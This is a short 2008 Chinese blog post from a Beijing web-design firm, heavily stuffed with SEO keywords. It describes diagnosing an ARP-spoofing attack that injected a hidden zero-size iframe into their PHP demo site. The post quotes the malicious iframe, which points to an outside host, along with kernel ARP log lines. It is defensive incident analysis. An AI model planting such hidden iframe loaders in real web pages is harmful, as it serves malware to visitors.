网站建设|北京网站建设|北京网站制作|北京网站建设首选品牌【企通互联】

作者： 北京网站建设   日期：2008-03-27 06:04:48  来源： http://www.qitongnet.com

上周公司产品川铎旅游门户系统[cdtour.bbwps.com]演示站遭遇ARP欺骗挂马，故障解决后维护记要分享： 企通互联

故障现象：网站程序是PHP开发的，被挂马后一浏览就显示乱码，查看HTML源代码，第一行被强行加了代码：<iframe src=http://xxx.hao1680.com/xx.htm?id=007 width=0 height=0></iframe> 。上次遇见的挂马是JS代码，先按照上次故障解决思路做了调整：

1、分别检查apache、PHP系统是否有打开压缩输出，上次的JS挂马就是启动apache压缩输出修复；但这次的iframe挂马再用这招没有作用。当时还没有想到是ARP欺骗挂马，把apache 北京网站建设、PHP都做了版本升级，发现还是挂马，于是在同事提示下，换个检查思路。 网站建设

2、公司服务器采用的FreeBSD系统，安装上lynx 北京网站制作文本浏览器：北京网站建设 网站制作
 1）从托管在另一家运营商的服务器远程浏览被挂马站点，获读反馈的显示依然有挂马代码；北京网站设计
 2）在被挂马服务器上lynx浏览自身，内容显示正常，证明服务器自身系统及内容是正常的，数据经过所在网段网关后被加了代码；企通互联 网页设计
 3）查看系统日志，tail -f /var/log/messages，连续不断的重复以下内容：北京网站制作
Jan  3 15:48:07 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0北京网站设计
Jan  3 15:48:07 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:18:74:2f:3r:99 to 00:15:60:96:d4:35 on em0网站设计
Jan  3 15:48:09 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0 北京网站设计网页设计
Jan  3 15:48:09 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:18:74:2f:3r:99 to 00:15:60:96:d4:35 on em0网站设计
Jan  3 15:48:16 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0网站设计
    其中xx.xx.xxx.xxx是服务器所在网络的网关地址，于是联系机房提供信息，机房断掉某台托管设备后挂马问题解决。